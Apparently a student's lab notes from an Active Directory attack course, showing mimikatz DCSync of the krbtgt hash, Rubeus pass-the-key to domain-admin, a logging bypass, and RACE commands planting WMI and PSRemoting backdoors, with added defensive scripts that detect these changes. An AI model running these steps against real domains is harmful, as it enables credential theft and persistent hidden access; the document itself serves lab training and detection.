## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Any change to the ACL of the domain object generates event ID 4662 with the detail "Directory Object
Access Right DACL was performed".
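Both steps of the procedure above leave a trace in the same event: the Add-ObjectAcl call is a WRITE_DAC on the domain object, and the DCSync itself is a control-access (extended right) operation whose Properties field carries the replication GUIDs shown in the PowerView output. The following function is an added example and is not from the lab notes; it reads event 4662 from a DC's Security log and reports both patterns. It assumes remote read access to the Security log (the lab DC name is used only as a default parameter) and that "Audit Directory Service Access" is enabled with a SACL covering the domain object, without which 4662 is not written at all.

```powershell
# Added example (not from the lab notes): hunt Security event 4662 for DACL writes on directory
# objects and for use of the replication extended rights (the DCSync pattern).

# Extended-right GUIDs for replication, as listed in the Add-ObjectAcl output above.
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)
$WRITE_DAC      = 0x40000   # access-mask bit: modify the DACL
$CONTROL_ACCESS = 0x100     # access-mask bit: exercise an extended right

function Find-SuspiciousDirectoryAccess {
    [CmdletBinding()]
    param(
        # Assumption: the lab DC; point it at any DC whose Security log you can read.
        [string]$ComputerName = 'dcorp-dc.dollarcorp.moneycorp.local',
        [int]$MaxEvents = 5000,
        # Accounts expected to replicate (DC computer accounts, directory sync services); baseline per domain.
        [string[]]$ExcludeSubject = @()
    )
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; Id = 4662 } `
                           -MaxEvents $MaxEvents -ErrorAction Stop

    foreach ($e in $events) {
        # Pull the named EventData fields out of the event XML.
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = [string]$d.'#text' }
        if ($data['SubjectUserName'] -in $ExcludeSubject) { continue }

        $mask  = [Convert]::ToInt32($data['AccessMask'], 16)   # logged as a hex string such as 0x100
        $props = $data['Properties']

        $daclWrite   = ($mask -band $WRITE_DAC) -ne 0
        $replication = (($mask -band $CONTROL_ACCESS) -ne 0) -and
                       [bool]($ReplicationGuids | Where-Object { $props -match $_ })
        if (-not ($daclWrite -or $replication)) { continue }

        $reason = if ($replication) { 'Replication extended right used (DCSync pattern)' }
                  else              { 'WRITE_DAC on directory object' }
        [pscustomobject]@{
            Time    = $e.TimeCreated
            Subject = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            Object  = $data['ObjectName']
            Mask    = ('0x{0:X}' -f $mask)
            Reason  = $reason
        }
    }
}

# Usage: everything that is not a DC computer account replicating is worth a look.
Find-SuspiciousDirectoryAccess -ExcludeSubject 'DCORP-DC$' | Format-Table -AutoSize
```

A user account, rather than a domain controller's computer account, appearing with the replication GUIDs is the classic DCSync indicator; the WRITE_DAC hits show who granted that right in the first place, which is the event the note above refers to.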

Using ACLs - Security Descriptors


WMI
It is possible to modify the security descriptors (the security information: owner, primary group, DACL
and SACL) of multiple remote access methods (WMI, PowerShell Remoting, Remote Registry, etc.) to allow
access to non-admin users. Administrative privileges are required for this.

This works as a very useful and impactful backdoor mechanism.

The Security Descriptor Definition Language (SDDL) defines the string format used to describe a security
descriptor. SDDL uses ACE strings for the DACL and SACL:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

The ACE for built-in administrators on WMI namespaces is:

A;CI;CCDCLCSWRPWPRCWD;;;BA
Since administrator privileges are required for this, if you want to access WMI on the domain controller,
domain administrator privileges are required.
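The right letters in a WMI namespace ACE reuse the generic SDDL codes, but WMI gives them its own meaning (CC is WBEM_ENABLE, WP is WBEM_REMOTE_ACCESS, and so on), which is what makes the ACE above readable as "full control of the namespace". The following script is an added example and is not part of the lab notes or the RACE toolkit. It parses a namespace descriptor with the .NET RawSecurityDescriptor class, decodes each ACE into WMI terms, and flags explicit (non-inherited) ACEs that hand remote access to a domain SID, which is exactly the footprint the Set-RemoteWMI step below leaves. The offline demonstration uses a constructed copy of the descriptor printed in that step's VERBOSE output; the second function fetches the live descriptor from a host's __SystemSecurity class.

```powershell
# Added example (not from the lab notes): decode a WMI namespace security descriptor and flag
# explicit ACEs that grant remote access to principals outside the built-in defaults.

# WMI-specific meaning of the SDDL right letters (WMI reuses the generic access-mask bits).
$WmiRights = [ordered]@{
    0x00001 = 'WBEM_ENABLE (CC)'
    0x00002 = 'WBEM_METHOD_EXECUTE (DC)'
    0x00004 = 'WBEM_FULL_WRITE_REP (LC)'
    0x00008 = 'WBEM_PARTIAL_WRITE_REP (SW)'
    0x00010 = 'WBEM_WRITE_PROVIDER (RP)'
    0x00020 = 'WBEM_REMOTE_ACCESS (WP)'
    0x20000 = 'READ_CONTROL (RC)'
    0x40000 = 'WRITE_DAC (WD)'
}
$WBEM_REMOTE_ACCESS = 0x20

function ConvertFrom-WmiNamespaceSddl {
    param([Parameter(Mandatory)][string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid  = $ace.SecurityIdentifier
        $name = $sid.Value
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        $rights = foreach ($bit in $WmiRights.Keys) { if ($ace.AccessMask -band $bit) { $WmiRights[$bit] } }
        [pscustomobject]@{
            Trustee    = $name
            Sid        = $sid.Value
            Type       = $ace.AceType
            Inherited  = $ace.IsInherited
            Rights     = ($rights -join ', ')
            # Explicitly added domain principal with remote access: the backdoor footprint.
            Suspicious = (-not $ace.IsInherited) -and ($sid.Value -like 'S-1-5-21-*') -and
                         (($ace.AccessMask -band $WBEM_REMOTE_ACCESS) -ne 0)
        }
    }
}

function Get-WmiNamespaceSddl {
    param([string]$ComputerName = $env:COMPUTERNAME, [string]$Namespace = 'root\cimv2')
    # __SystemSecurity.GetSD returns the descriptor as a byte array; convert it to SDDL text.
    $bytes = (Invoke-WmiMethod -ComputerName $ComputerName -Namespace $Namespace `
                               -Path '__systemsecurity=@' -Name GetSD).SD
    $raw = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)
    $raw.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)
}

# Offline demonstration: a constructed copy of the root\cimv2 descriptor shown in the RACE output below.
$sample = 'O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13616)' +
          '(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)'
ConvertFrom-WmiNamespaceSddl -Sddl $sample | Format-Table Trustee, Inherited, Suspicious, Rights -AutoSize

# Live check of a host (requires admin rights on the target):
# ConvertFrom-WmiNamespaceSddl -Sddl (Get-WmiNamespaceSddl -ComputerName 'dcorp-dc') | Where-Object Suspicious
```

On an untouched namespace every ACE is inherited (the ID flag) from the root namespace and the only full-control trustee is BA; an explicit ACE for an individual domain SID with WBEM_REMOTE_ACCESS set is what the Set-RemoteWMI step adds, and it survives reboots and password changes because it lives in the WMI repository rather than in any logon token.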
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> Get-WmiObject -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Class
win32_OperatingSystem -Namespace root\Cimv2 | fl *
Get-WmiObject : Access is denied.
At line:1 char:1
+ Get-WmiObject -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Clas ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
+ FullyQualifiedErrorId :
System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

Initially we are not able to access WMI. We will grant the relevant permissions to our student account so
that it can access WMI on the domain controller. For this we will use the RACE toolkit.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : TTW95PEJ
[*] Domain : 89B3Z8Y2
[*] Password : K4IDDNM1
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3896
[+] LUID : 0x17ae61

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1551969
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x17ae61
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/2/2024 6:00:16 AM
EndTime : 7/2/2024 4:00:16 PM
RenewTill : 7/9/2024 6:00:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uJI37jPwPkH7jkGeoKP+9VnSwT1AgO//dIRYIMGHFYA=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with Domain Administrator privileges.


C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll
C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\RACE.ps1
PS C:\Windows\system32> Set-RemoteWMI -SamAccountName student163 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Namespace root\cimV2 -Verbose
VERBOSE: Existing ACL for namespace root\cimV2 is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13616)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13611)(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)
VERBOSE: Existing ACL for DCOM is
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)(A;;CCDCLCSWRP;;;S-1-5-21-719815819-3726368948-3917688648-13616)(A;;CCDCLCSWRP;;;S-1-5-21-719815819-3726368948-3917688648-13611)
VERBOSE: New ACL for namespace root\cimV2 is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13616)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13611)(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13603)
VERBOSE: New ACL for DCOM
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCDCSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)(A;;CCDCLCSWRP;;;S-1-5-21-719815819-3726368948-3917688648-13616)(A;;CCDCLCSWRP;;;S-1-5-21-719815819-3726368948-3917688648-13611)(A;;CCDCLCSWRP;;;S-1-5-21-719815819-3726368948-3917688648-13603)
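To see exactly what Set-RemoteWMI changed on the namespace, here is an added example (not from the lab notes or the RACE toolkit) that parses the two root\cimV2 SDDL strings printed above, diffs them, and names the WMI rights granted to the new trustee; this is the check a defender would run against a baseline export of the namespace security descriptor. The right-name mapping is the WMI interpretation of the standard SDDL bit values, and the baseline trustee list is an assumption.

```python
import re
from dataclasses import dataclass

# The two namespace SDDLs that Set-RemoteWMI printed above, joined onto single lines.
OLD_NS_SDDL = (
    "O:BAG:BAD:"
    "(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13616)"
    "(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13611)"
    "(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP;;;AU)"
)
NEW_NS_SDDL = OLD_NS_SDDL + "(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13603)"

# SDDL right codes as WMI interprets the same bit values (CC=0x1 ... WP=0x20, RC=0x20000, WD=0x40000).
WBEM_RIGHTS = {
    "CC": "WBEM_ENABLE",            # connect to the namespace at all
    "DC": "WBEM_METHOD_EXECUTE",    # invoke provider methods (e.g. Win32_Process.Create)
    "LC": "WBEM_FULL_WRITE_REP",
    "SW": "WBEM_PARTIAL_WRITE_REP",
    "RP": "WBEM_WRITE_PROVIDER",
    "WP": "WBEM_REMOTE_ACCESS",     # connect over DCOM from another host
    "RC": "READ_CONTROL",
    "WD": "WRITE_DAC",              # rewrite the namespace ACL itself
}
# Assumed baseline: trustees that hold rights on root\cimv2 on a stock install.
BASELINE_TRUSTEES = frozenset({"BA", "NS", "LS", "AU"})

# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^)]*)\)")


@dataclass(frozen=True)
class Ace:
    ace_type: str        # "A" allow, "D" deny
    flags: frozenset     # e.g. {"CI", "ID"}
    rights: frozenset    # two-letter right codes, e.g. {"CC", "WP"}
    trustee: str         # SID string or well-known alias such as "BA"


def _codes(field):
    """Split a run of two-letter SDDL codes ("CCDCWP") into a set; keep hex masks whole."""
    if field.startswith("0x"):
        return frozenset({field})
    return frozenset(field[i:i + 2] for i in range(0, len(field), 2))


def parse_dacl(sddl):
    """Return the ACEs of the DACL part of an SDDL security descriptor string."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]   # DACL sits between D: and an optional S:
    return [Ace(t, _codes(f), _codes(r), trustee)
            for t, f, r, _obj, _inh, trustee in ACE_RE.findall(dacl)]


def added_aces(old_sddl, new_sddl):
    """ACEs present in new_sddl but absent from old_sddl (order-insensitive)."""
    old = set(parse_dacl(old_sddl))
    return [ace for ace in parse_dacl(new_sddl) if ace not in old]


def overprivileged_trustees(sddl):
    """Non-baseline trustees holding remote access plus WRITE_DAC: works without a baseline export."""
    return [ace.trustee for ace in parse_dacl(sddl)
            if ace.ace_type == "A" and ace.trustee not in BASELINE_TRUSTEES
            and {"WP", "WD"} <= ace.rights]


def audit_namespace_change(old_sddl, new_sddl):
    """Describe every newly added allow ACE for a non-baseline trustee in plain words."""
    findings = []
    for ace in added_aces(old_sddl, new_sddl):
        if ace.ace_type != "A" or ace.trustee in BASELINE_TRUSTEES:
            continue
        names = ", ".join(sorted(WBEM_RIGHTS.get(code, code) for code in ace.rights))
        scope = " (inherits to child namespaces)" if "CI" in ace.flags else ""
        findings.append(f"new allow ACE for {ace.trustee}: {names}{scope}")
    return findings


if __name__ == "__main__":
    for finding in audit_namespace_change(OLD_NS_SDDL, NEW_NS_SDDL):
        print(finding)
    print("non-baseline trustees with full control:", overprivileged_trustees(NEW_NS_SDDL))
```

The same parser applied to the DCOM SDDL pair above would report the second ACE the tool added, which carries CCDCLCSWRP but not WP or WD.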

Now we will access WMI with our normal student account.


PS C:\Windows\system32> Get-WmiObject -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Class win32_OperatingSystem -Namespace root\Cimv2 | fl *

PSComputerName : DCORP-DC
Status : OK
Name : Microsoft Windows Server 2022 Standard|C:\Windows|\Device\Harddisk0\Partition3
FreePhysicalMemory : 883540
FreeSpaceInPagingFiles : 404908
FreeVirtualMemory : 1367796
__GENUS : 2
__CLASS : Win32_OperatingSystem
__SUPERCLASS : CIM_OperatingSystem
__DYNASTY : CIM_ManagedSystemElement
__RELPATH : Win32_OperatingSystem=@
__PROPERTY_COUNT : 64
__DERIVATION : {CIM_OperatingSystem, CIM_LogicalElement, CIM_ManagedSystemElement}
__SERVER : DCORP-DC
__NAMESPACE : root\Cimv2
__PATH : \\DCORP-DC\root\Cimv2:Win32_OperatingSystem=@
BootDevice : \Device\HarddiskVolume1
BuildNumber : 20348
BuildType : Multiprocessor Free
Caption : Microsoft Windows Server 2022 Standard
CodeSet : 1252
CountryCode : 1
CreationClassName : Win32_OperatingSystem
CSCreationClassName : Win32_ComputerSystem
CSDVersion :
CSName : DCORP-DC
CurrentTimeZone : -420
DataExecutionPrevention_32BitApplications : True
DataExecutionPrevention_Available : True
DataExecutionPrevention_Drivers : True
DataExecutionPrevention_SupportPolicy : 3
Debug : False
Description :
Distributed : False
EncryptionLevel : 256
ForegroundApplicationBoost : 2
InstallDate : 20221111053444.000000-480
LargeSystemCache :
LastBootUpTime : 20240701104558.800971-420
LocalDateTime : 20240702095749.113000-420
Locale : 0409
Manufacturer : Microsoft Corporation
MaxNumberOfProcesses : 4294967295
MaxProcessMemorySize : 137438953344
MUILanguages : {en-US}
NumberOfLicensedUsers :
NumberOfProcesses : 75
NumberOfUsers :
OperatingSystemSKU : 7
Organization :
OSArchitecture : 64-bit
OSLanguage : 1033
OSProductSuite : 272
OSType : 18
OtherTypeDescription :
PAEEnabled :
PlusProductID :
PlusVersionNumber :
PortableOperatingSystem : False
Primary : True
ProductType : 2
RegisteredUser : Windows User
SerialNumber : 00454-30000-00000-AA745
ServicePackMajorVersion : 0
ServicePackMinorVersion : 0
SizeStoredInPagingFiles : 814684
SuiteMask : 272
SystemDevice : \Device\HarddiskVolume3
SystemDirectory : C:\Windows\system32
SystemDrive : C:
TotalSwapSpaceSize :
TotalVirtualMemorySize : 2910756
TotalVisibleMemorySize : 2096072
Version : 10.0.20348
WindowsDirectory : C:\Windows
Scope : System.Management.ManagementScope
Path : \\DCORP-DC\root\Cimv2:Win32_OperatingSystem=@
Options : System.Management.ObjectGetOptions
ClassPath : \\DCORP-DC\root\Cimv2:Win32_OperatingSystem
Properties : {BootDevice, BuildNumber, BuildType, Caption...}
SystemProperties : {__GENUS, __CLASS, __SUPERCLASS, __DYNASTY...}
Qualifiers : {dynamic, Locale, provider, Singleton...}
Site :
Container :

PowerShell Remoting
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ScriptBlock { hostname;whoami }
[dcorp-dc.dollarcorp.moneycorp.local] Connecting to remote server dcorp-dc.dollarcorp.moneycorp.local failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

We will use the RACE toolkit to grant the student user the relevant permissions. This needs to be executed with Domain Administrator privileges.

PS C:\Windows\system32> Set-RemotePSRemoting -SamAccountName student163 -ComputerName dcorp-dc.dollarcorp.moneycorp.local
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed with the following error message: The I/O operation has been aborted because of either a thread exit or an application request. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken

This error can be ignored; it only means that the target did not close the WinRM connection gracefully.

Now we can access the domain controller using PSRemoting.


PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ScriptBlock { hostname;whoami }
dcorp-dc
dcorp\student163
Remote Registry back door
